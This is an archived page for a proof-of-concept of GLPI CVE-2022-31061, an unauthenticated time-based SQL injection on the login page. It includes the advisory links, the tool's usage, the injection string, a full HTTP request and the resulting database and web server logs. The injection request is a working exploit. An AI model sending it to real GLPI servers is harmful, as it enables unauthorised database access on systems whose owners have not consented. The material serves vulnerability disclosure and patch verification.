CVE-2022-31061 PoC — GLPI SQL注入漏洞

Source

https://github.com/Wangyanan131/CVE-2022-31061

Associated Vulnerability

Title:GLPI SQL注入漏洞 (CVE-2022-31061)
Description:GLPI是个人开发者的一款开源IT和资产管理软件。该软件提供功能全面的IT资源管理接口，你可以用它来建立数据库全面管理IT的电脑，显示器，服务器，打印机，网络设备，电话，甚至硒鼓和墨盒等。 GLPI 9.3.0及之前版本存在SQL注入漏洞，该漏洞源于登录页面上存在 SQL 注入漏洞。

Description

PoC for GLPI CVE-2022-31061

Readme

# CVE-2022-31061
PoC for GLPI CVE-2022-31061

A Proof of Concept for GLPI >= 9.3.0 and < 10.0.2 - Unauthenticated SQL injection on login page

## Legal disclaimer : 
Use of this script for attacking à target without mutual consent is illegal. 
It's is the end user responsibility to obey all applicables laws for his location
Developers assume no lisibility and are not responsible for any misuse or domage caused by this program

## Context :
Public disclosure : https://github.com/glpi-project/glpi/security/advisories/GHSA-w2gc-v2gm-q7wq on 2022-06-28

Patch : https://github.com/glpi-project/glpi/releases/tag/10.0.2 on 2022-06-28

Commit : https://github.com/glpi-project/glpi/commit/21ae07d00d0b3230f6235386e98388cfc5bb0514

## Vulnerability : 
- page : POST /front/login.php
- parameter : &auth=ldap-1%27+UNION+SELECT+SLEEP%285%29+%23+
- injection : Blind Time based injection

##Usage 
```
Usage: CVE-2022-31061.py -t https://example.com [-v] [-c cmd]

Options:
  -h, --help            show this help message and exit
  -t TARGET, --target=TARGET
                        GLPI Website to audit
  -v, --verbose         Display verbose output
  -c CMD, --cmd=CMD     payload to inject. Time based Bind Injection. Context
                        : ' SELECT `id` FROM `glpi_users` WHERE `name` =
                        'fzrfdse' AND `authtype` = '3' AND `auths_id` = '1'
                        [payload] # '
  -u USERAGENT, --user-agent=USERAGENT
                        user-agent to use
  -p PROXY, --proxy=PROXY
                        proxy to use
```

## Example :
Command :
```
$ python CVE-2022-31061.py -t http://target
[ 2022-08-07 14:47:35.911449 ] Begin send request for  UNION SELECT SLEEP(5)
[ 2022-08-07 14:47:54.533460 ] End send request for  UNION SELECT SLEEP(5)  Duration :  18.619755
SUCCESS : target is vulnerable
```

Request :
```
POST /front/login.php HTTP/1.1
Host: target
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Referer: http://target/index.php
Cookie: glpi_3f946f74140a3178722cb675d5bf6b47=921opoti2tp4uk3g35sgor5had
Content-Length: 243
Content-Type: application/x-www-form-urlencoded

noAuto=0&redirect=&_glpi_csrf_token=b029a0270351f75ba69cced0385bd77deb548ec0db25eec2c511ee9064ec6bd6&fielda62f008c7f1837=FWVJDCDC&fieldb62f008c7f1838=U6XGS34JKQPC1LD6&auth=ldap-1%27+UNION+SELECT+SLEEP%285%29+%23+&fieldc62f008c7f1839=on&submit=
```

MySQL Logs :
```
SELECT `id` FROM `glpi_users` WHERE `name` = 'FWVJDCDC' AND `authtype` = '3' AND `auths_id` = '1' UNION SELECT SLEEP(5) # '
```

Nginx logs :
```
tester - - [07/Aug/2022:20:47:35 +0200] "GET /index.php HTTP/1.1" 200 3173 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0"
tester - - [07/Aug/2022:20:47:54 +0200] "POST /front/login.php HTTP/1.1" 200 9232 "http://target/index.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0"
```

File Snapshot


 [4.0K]  /data/pocs/6f8224c271e0e8eab9576cf32826c93083a30348
├── [6.6K]  CVE-2022-31061.py
├── [1.0K]  LICENSE
└── [2.9K]  README.md

0 directories, 3 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!